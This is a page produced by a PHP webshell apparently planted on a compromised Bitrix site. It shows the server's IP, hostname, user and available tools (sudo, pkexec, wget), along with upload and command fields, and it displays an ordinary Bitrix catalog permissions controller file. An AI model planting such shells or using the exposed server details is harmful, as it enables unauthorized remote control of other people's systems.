403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/components/bitrix/catalog.config.permissions/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/components/bitrix/catalog.config.permissions/ajax.php
<?php
if (!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED !== true)
{
	die();
}

use Bitrix\Catalog\Access\ActionDictionary;
use Bitrix\Main\Engine\CurrentUser;
use Bitrix\Main\Localization\Loc;
use Bitrix\Main\Error;
use Bitrix\Catalog\Access\AccessController;
use Bitrix\Catalog\Access\Service\RolePermissionService;
use Bitrix\Catalog\Config\State;

if (!Bitrix\Main\Loader::includeModule('catalog'))
{
	return;
}

class CatalogConfigPermissionsAjaxController extends \Bitrix\Main\Engine\Controller
{
	public function savePermissionsAction(array $userGroups = [], array $deletedUserGroups = [], array $parameters = []): ?array
	{
		if (!AccessController::can(CurrentUser::get()->getId(), ActionDictionary::ACTION_CATALOG_RIGHTS_EDIT))
		{
			return null;
		}

		if (!empty($userGroups))
		{
			$this->saveUserGroups($userGroups);
		}

		if (!empty($deletedUserGroups))
		{
			$this->deleteUserGroups($deletedUserGroups);
		}

		return $this->errorCollection->isEmpty() ? $this->loadData() : null;
	}

	private function saveUserGroups(array $userGroups): void
	{
		try
		{
			$rolePermissionService = new RolePermissionService();
			if (!State::isUsedInventoryManagement())
			{
				$userGroups = $rolePermissionService->appendInventoryManagmentPermissions($userGroups);
			}

			$rolePermissionService->saveRolePermissions($userGroups);
		}
		catch (\Exception $e)
		{
			$this->errorCollection[] = new Error(Loc::getMessage('CATALOG_CONFIG_PERMISSIONS_DB_ERROR'));
		}
	}

	private function deleteUserGroups(array $deletedUserGroups): void
	{
		\Bitrix\Main\Type\Collection::normalizeArrayValuesByInt($deletedUserGroups);

		foreach ($deletedUserGroups as $roleId)
		{
			try
			{
				(new RolePermissionService())->deleteRole($roleId);
			}
			catch (\Bitrix\Main\DB\SqlQueryException $e)
			{
				$this->errorCollection[] = new Error(Loc::getMessage('CATALOG_CONFIG_ROLE_DELETE_DB_ERROR'));
			}
		}
	}

	/**
	 *
	 * @return null | array
	 */
	public function loadAction(): ?array
	{
		if (!AccessController::can(CurrentUser::get()->getId(), ActionDictionary::ACTION_CATALOG_RIGHTS_EDIT))
		{
			return null;
		}

		return $this->loadData();
	}

	/**
	 * @return array
	 */
	private function loadData(): array
	{
		$configPermissions = new \Bitrix\Catalog\Access\Component\PermissionConfig();

		return [
			'USER_GROUPS' => $configPermissions->getUserGroups(),
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit